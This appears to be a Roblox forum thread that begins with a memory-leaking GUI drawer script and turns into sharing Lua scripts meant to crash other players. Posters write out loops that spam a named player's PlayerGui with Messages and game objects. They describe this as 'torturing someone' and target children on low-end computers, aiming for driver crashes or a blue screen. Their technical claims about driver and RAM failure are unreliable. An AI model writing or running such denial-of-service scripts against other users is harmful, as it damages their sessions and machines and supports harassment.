I went here today to see the GUI drawer su8 made. I set the quality option to 1 and pressed draw. A few seconds later, the GUI appeared along with a bit of lag.
I then changed quality to 0. I kept on waiting this time to see what would happen. Roblox just appeared to be completely still. Then a popup came on my screen mentioning something about system memory and closing RobloxPlayer.exe but before I got a chance to click the button, my screen went blank and Windows crashed.
I repeated this again and closes looked at memory on Task Manager and saw it slowly creep up to 1.5 GB before I closed it.
su8, can you tell us what is going on? And then we can use it to kick nubs from SBs. |

| It simply creates sizeX/quality * (sizeY/quality) gui frames. |

This would be that Memory Leak I posted about a week ago. It completely eats all of your RAM (including Page File) and you will receive the Blue Screen of Death. Did you get the IRQL_NOT_LESS_OR_EQUAL error code?

My favorite:
-- The LAG :D -- Will timeout, not very effective for a = 1, math.huge do local b = Instance.new("Message", game.Players.AbsoluteLOL.PlayerGui) b.Text = "Bye :D" end

..Again it will crash aplication...
for number=1,math.huge do end
Is same as
while true do end
Or
repeat until false |

Incorrect. Spamming the user with messages will give them a Graphics Driver error and possibly the BSoD. If you do multiple loops, the user will not be able to close the application. Do note: if the user has a high-end computer, their Graphics Driver won't be affected.
I've seen it happen before, I know what I say is true.

GeForce 340 is OK compared to most of the community's graphics cards. Most of the younger kids (who tend to go on SBs the most) have low-end-ish computer, making it easy to crash their system. I have seen another method as well, it's pretty much just spamming their PlayerGui with nearly every object in the game. The script times out however, so it's not very effective.

I just find this the most effective way of torturing someone:
local objects = { "Part", "ScreenGui", "TextLabel", "Message", "Hint", "ImageLabel", "Sound", "Mesh" } -- I don't feel like typing them all in local players = game:GetService("Players")
function crash(p) if not (players:findFirstChild(p)) then return end local pgui = players[p].PlayerGui for a, b in pairs(objects) do for var = 1, math.huge do local obj = Instance.new(b, pgui) end end end
crash("AbsoluteLOL")

Wow. So somehow, that leaks memory constantly :/

That indicates one of two things: - Total Graphics Driver Failure (non-recoverable without restart) - RAM Module Failure |

local t = {{}} while true do table.insert(t,{t}) for i,v in pairs(t) do for o,u in pairs(t) do table.insert(v,u) end end end
I wonder what that would do. |
